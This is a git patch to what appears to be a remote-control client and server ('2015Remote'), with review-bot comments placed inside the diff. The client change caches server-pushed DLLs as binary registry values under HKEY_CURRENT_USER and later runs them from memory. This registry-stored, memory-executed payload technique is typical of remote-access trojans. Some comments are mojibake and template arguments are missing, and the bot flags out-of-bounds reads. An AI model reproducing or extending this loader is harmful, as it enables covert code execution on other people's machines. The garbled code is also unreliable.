From 45e7950bb79d89345dbb25f33622636158a76037 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Sat, 12 Jul 2025 14:24:35 +0800
Subject: [PATCH] Improve: Save DLL data to registry
---
 client/KernelManager.cpp | 26 +++++++--
 common/iniFile.h | 84 +++++++++++++++++++++++++++++
 server/2015Remote/2015RemoteDlg.cpp | 15 +++---
 3 files changed, 114 insertions(+), 11 deletions(-)
diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index 20b41b6..69fbf1f 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -265,13 +265,31 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 const char* md5 = info->Md5;
 auto find = m_MemDLL.find(md5);
 if (find == m_MemDLL.end() && ulLength == sz) {
- // 第一个命令没有包含DLL数据,需客户端检测本地是否已经有相关DLL,没有则向主控请求执行代码
- m_ClientObject->Send2Server((char*)szBuffer, ulLength);
- break;
+ iniFile cfg(CLIENT_PATH);
+ auto md5 = cfg.GetStr("settings", info->Name + std::string(".md5"));
+ if (md5.empty() || md5 != info->Md5) {
+ // 第一个命令没有包含DLL数据,需客户端检测本地是否已经有相关DLL,没有则向主控请求执行代码
+ m_ClientObject->Send2Server((char*)szBuffer, ulLength);
+ break;
+ }
+ Mprintf("Execute local DLL from registry: %s\n", md5.c_str());
+ binFile bin(CLIENT_PATH);
+ auto local = bin.GetStr("settings", info->Name + std::string(".bin"));
+ const BYTE* bytes = reinterpret_cast(local.data());
+ m_MemDLL[md5] = std::vector(bytes + sz, bytes + sz + info->Size);
+ find = m_MemDLL.find(md5);
 }
 BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL;
 if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
- if (md5[0]) m_MemDLL[md5] = std::vector(szBuffer + sz, szBuffer + sz + info->Size);
+ if (md5[0]) {
+ m_MemDLL[md5] = std::vector(szBuffer + sz, szBuffer + sz + info->Size);
+ iniFile cfg(CLIENT_PATH);
+ cfg.SetStr("settings", info->Name + std::string(".md5"), md5);
+ binFile bin(CLIENT_PATH);
+ std::string buffer(reinterpret_cast(szBuffer), ulLength);
+ bin.SetStr("settings", info->Name + std::string(".bin"), buffer);
+ Mprintf("Save DLL to registry: %s\n", md5);
+ }
 data = szBuffer + sz;
 }
 if (data) {
diff --git a/common/iniFile.h b/common/iniFile.h
index a7983cc..e6df511 100644
--- a/common/iniFile.h
+++ b/common/iniFile.h
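Review bot: `auto md5 = cfg.GetStr(...)` inside the `if (find == m_MemDLL.end() && ulLength == sz)` block shadows the outer `const char* md5 = info->Md5`, so the same name is a `std::string` up to the closing brace and a `const char*` again at `if (md5[0])` further down; rename the inner one, e.g. `auto storedMd5 = cfg.GetStr("settings", info->Name + std::string(".md5"));`, and use that name in its later uses inside the block. `std::vector(bytes + sz, bytes + sz + info->Size)` copies `sz + info->Size` bytes out of `local` without ever comparing against `local.size()`, so a truncated or unrelated `.bin` value is read past the end of the string; take the existing request path first, `if (local.size() < sz + info->Size) { m_ClientObject->Send2Server((char*)szBuffer, ulLength); break; }`, before the copy. OnReceive begins and ends outside the hunk.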
@@ -124,3 +124,87 @@ public:
 }
 }
 };
+
+class binFile : public config
+{
+private:
+ HKEY m_hRootKey;
+ std::string m_SubKeyPath;
+
+public:
+ ~binFile() {}
+
+ binFile(const std::string& path = CLIENT_PATH)
+ {
+ m_hRootKey = HKEY_CURRENT_USER;
+ m_SubKeyPath = path;
+ }
+
+ // 写入整数(写为二进制)
+ bool SetInt(const std::string& MainKey, const std::string& SubKey, int Data) override
+ {
+ return SetBinary(MainKey, SubKey, reinterpret_cast(&Data), sizeof(int));
+ }
+
+ // 写入字符串(以二进制方式)
+ bool SetStr(const std::string& MainKey, const std::string& SubKey, const std::string& Data) override
+ {
+ return SetBinary(MainKey, SubKey, reinterpret_cast(Data.data()), static_cast(Data.size()));
+ }
+
+ // 读取字符串(从二进制数据转换)
+ std::string GetStr(const std::string& MainKey, const std::string& SubKey, const std::string& def = "") override
+ {
+ std::vector buffer;
+ if (!GetBinary(MainKey, SubKey, buffer))
+ return def;
+
+ return std::string(buffer.begin(), buffer.end());
+ }
+
+ // 读取整数(从二进制解析)
+ int GetInt(const std::string& MainKey, const std::string& SubKey, int defVal = 0) override
+ {
+ std::vector buffer;
+ if (!GetBinary(MainKey, SubKey, buffer) || buffer.size() < sizeof(int))
+ return defVal;
+
+ int value = 0;
+ memcpy(&value, buffer.data(), sizeof(int));
+ return value;
+ }
+
+private:
+ bool SetBinary(const std::string& MainKey, const std::string& SubKey, const BYTE* data, DWORD size)
+ {
+ std::string fullPath = m_SubKeyPath + "\\" + MainKey;
+ HKEY hKey;
+ if (RegCreateKeyExA(m_hRootKey, fullPath.c_str(), 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) != ERROR_SUCCESS)
+ return false;
+
+ bool bRet = (RegSetValueExA(hKey, SubKey.c_str(), 0, REG_BINARY, data, size) == ERROR_SUCCESS);
+ RegCloseKey(hKey);
+ return bRet;
+ }
+
+ bool GetBinary(const std::string& MainKey, const std::string& SubKey, std::vector& outData)
+ {
+ std::string fullPath = m_SubKeyPath + "\\" + MainKey;
+ HKEY hKey;
+ if (RegOpenKeyExA(m_hRootKey, fullPath.c_str(), 0, KEY_READ, &hKey) != ERROR_SUCCESS)
+ return false;
+
+ DWORD dwType = 0;
+ DWORD dwSize = 0;
+ if (RegQueryValueExA(hKey, SubKey.c_str(), NULL, &dwType, NULL, &dwSize) != ERROR_SUCCESS || dwType != REG_BINARY)
+ {
+ RegCloseKey(hKey);
+ return false;
+ }
+
+ outData.resize(dwSize);
+ bool bRet = (RegQueryValueExA(hKey, SubKey.c_str(), NULL, NULL, outData.data(), &dwSize) == ERROR_SUCCESS);
+ RegCloseKey(hKey);
+ return bRet;
+ }
+};
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 96c7191..565cf78 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
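Review bot: `GetBinary` sizes `outData` from the first `RegQueryValueExA` call, but the second call, the one that copies the bytes, updates `dwSize` to the count actually written and the vector is never adjusted to it; if the value shrank between the two calls the tail of `outData` is stale zero bytes, and if it grew the second call fails with ERROR_MORE_DATA while `outData` keeps its old size. Resize after the copying call, `outData.resize(bRet ? dwSize : 0);`, placed right after the `bool bRet = (...)` line. `binFile(const std::string& path = CLIENT_PATH)` is a converting constructor and should be `explicit`, and the empty `~binFile() {}` only suppresses the implicit move operations and can be removed. The missing template arguments on `reinterpret_cast(...)`, `static_cast(...)` and `std::vector` throughout this hunk look like a rendering artifact of the page rather than the committed code.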
@@ -221,28 +221,29 @@ DllInfo* ReadPluginDll(const std::string& filename) {
 // 鍒嗛厤缂撳啿鍖: CMD + DllExecuteInfo + size
 BYTE* buffer = new BYTE[1 + sizeof(DllExecuteInfo) + fileSize];
- if (!file.read(reinterpret_cast(buffer + 1 + sizeof(DllExecuteInfo)), fileSize)) {
+ BYTE* dllData = buffer + 1 + sizeof(DllExecuteInfo);
+ if (!file.read(reinterpret_cast(dllData), fileSize)) {
 Mprintf("璇诲彇鏂囦欢澶辫触: %s\n", filename.c_str());
 delete[] buffer;
 return nullptr;
 }
- if (!IsDll64Bit(buffer + 1 + sizeof(DllExecuteInfo))) {
+ if (!IsDll64Bit(dllData)) {
 Mprintf("涓嶆敮鎸32浣岲LL: %s\n", filename.c_str());
 delete[] buffer;
 return nullptr;
 }
 std::string masterHash(skCrypt(MASTER_HASH));
- int offset = MemoryFind((char*)buffer + 1 + sizeof(DllExecuteInfo), masterHash.c_str(), fileSize, masterHash.length());
+ int offset = MemoryFind((char*)dllData, masterHash.c_str(), fileSize, masterHash.length());
 if (offset != -1) {
 std::string masterId = GetPwdHash(), hmac = GetHMAC();
 if(hmac.empty()) hmac = THIS_CFG.GetStr("settings", "HMAC");
- memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo)+offset, masterId.c_str(), masterId.length());
- memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo) + offset + masterId.length(), hmac.c_str(), hmac.length());
+ memcpy((char*)dllData + offset, masterId.c_str(), masterId.length());
+ memcpy((char*)dllData + offset + masterId.length(), hmac.c_str(), hmac.length());
 }
 // 璁剧疆杈撳嚭鍙傛暟
- auto md5 = CalcMD5FromBytes(buffer + 1 + sizeof(DllExecuteInfo), fileSize);
+ auto md5 = CalcMD5FromBytes(dllData, fileSize);
 DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, };
 memcpy(info.Name, name.c_str(), name.length());
 memcpy(info.Md5, md5.c_str(), md5.length());
@@ -2659,7 +2660,7 @@ void CMy2015RemoteDlg::OnDynamicSubMenu(UINT nID) {
 Buffer* buf = m_DllList[menuIndex]->Data;
 int iItem = m_CList_Online.GetNextSelectedItem(Pos);
 context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
- ContextObject->Send2Client( buf->Buf(), 1 + sizeof(DllExecuteInfo));
+ ContextObject->Send2Client( buf->Buf(), 1 + sizeof(DllExecuteInfo) );
 }
 LeaveCriticalSection(&m_cs);
 }